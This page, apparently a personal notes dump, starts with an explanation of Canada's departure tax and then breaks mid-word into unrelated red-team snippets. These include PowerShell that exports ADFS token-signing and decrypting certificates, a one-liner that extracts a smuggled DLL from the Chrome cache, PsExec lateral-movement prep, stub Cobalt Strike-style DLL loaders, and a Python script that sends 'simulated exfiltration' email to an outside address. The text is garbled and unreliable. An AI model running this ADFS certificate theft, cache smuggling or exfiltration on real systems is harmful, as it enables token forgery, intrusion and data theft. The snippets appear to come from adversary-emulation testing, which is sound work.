
Derek Martin justaguywhocodes

Canada does impose a "departure tax" on individuals who permanently emigrate and cease to be tax residents. This is not a flat fee but rather a capital gains tax triggered by a "deemed disposition" of assets under the Income Tax Act. It's designed to tax unrealized gains that accrued while you were a Canadian resident. Here's a breakdown of how it works, based on current rules as of 2026.

When It Applies

The departure tax kicks in when you become a non-resident of Canada for tax purposes. This typically happens if you sever residential ties (e.g., sell your home, move family abroad, spend less than 183 days in Canada annually, and establish residency elsewhere).
It's applied in the year you emigrate, on the date you cease residency.
Canada taxes your worldwide income up to the departure date as a resident, and only Canadian-sourced income afterward as a non-resident.
If you return to Canada within five years, you may be able to unwind some effects, but that's case-specific.
Assets Affected and ExceptionsDee
# Retrieve Token-Signing Certificate
$signingCert = Get-AdfsCertificate -CertificateType "Token-Signing"
Export-PfxCertificate -Cert $signingCert.Certificate -FilePath "C:\temp\ADFS_Signing.pfx" -Password (ConvertTo-SecureString -String "YourSecurePassword!" -Force -AsPlainText)
# Retrieve Token-Decrypting Certificate
$decryptingCert = Get-AdfsCertificate -CertificateType "Token-Decrypting"
Export-PfxCertificate -Cert $decryptingCert.Certificate -FilePath "C:\temp\ADFS_Decrypting.pfx" -Password (ConvertTo-SecureString -String "YourSecurePassword!" -Force -AsPlainText)
$d="$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cache\Cache_Data\"; if (Test-Path $d) { gci $d -File | ForEach-Object { try { $s = [System.Text.Encoding]::Default.GetString([System.IO.File]::ReadAllBytes($_.FullName)); if ($s -match '(?s)INDLL(?<content>.*?)OUTDLL') { [System.IO.File]::WriteAllBytes("$d\hello.dll", [System.Text.Encoding]::Default.GetBytes($matches['content'])); Write-Host " found in $($_.Name). Extracted to $d\hello.dll"; break } } catch { Write-Warning "Error processing $($_.Name): $_" } }; if (!$?) { Write-Host "No matches found" } }
Step 0: Pre-requisites - Enable Remote Administration on the Remote Machine
We need to ensure the remote machine allows remote administration. We'll do:
0.1 Enable File and Printer Sharing (SMB) and Remote Administration exceptions in Windows Firewall.
We can use netsh to enable the firewall rules. We'll run these commands on the remote machine. Since we are testing, we can use PsExec to run these commands remotely.
Note: This step might already be done in your environment. If you are in a lab and the firewall is off, you can skip. But for completeness:
// testdll.c
// Simple Windows DLL that exports a function compatible with rundll32.exe
// When called via rundll32.exe testdll.dll,ExecuteTest
// it writes "test executed" to C:\Users\Public\Downloads\test.txt
#include <windows.h>
#include <stdio.h>
// Exported function (rundll32-compatible signature)
extern "C" __declspec(dllexport) void CALLBACK ExecuteTest(
https://www.visualcapitalist.com/wp-content/uploads/2023/08/global-economy-2023-1200px.jpg
Step-by-Step Commands
Install the PowerForensics Module (if not installed):
Install-Module -Name PowerForensics -Force -Confirm:$false -Scope CurrentUser
Create a Test File (e.g., C:\test\malicious.txt):
import smtplib
from email.mime.text import MIMEText
# CONFIGURATION (TEST CREDENTIALS ONLY)
sender_email = "derekmartinsf@gmail.com" # Use a dedicated TEST account
password = "yourpassword" # Generate an App Password: https://myaccount.google.com/apppasswords
receiver_email = "accounting@bnp.bz"# Destination
smtp_server = "smtp.gmail.com"
port = 587 # TLS port
message = "Simulated TrillClient data exfiltration test."
1. Create a Test DLL Loader
Simulate a benign Cobalt Strike-style DLL loader. Save this as test_loader.c:
#include <windows.h>
// Export a function (common in Cobalt Strike loaders)
__declspec(dllexport) void Run(void) {
// Benign test action: create a temporary file
HANDLE hFile = CreateFileA("C:\\Windows\\Temp\\test_ttp_success.txt",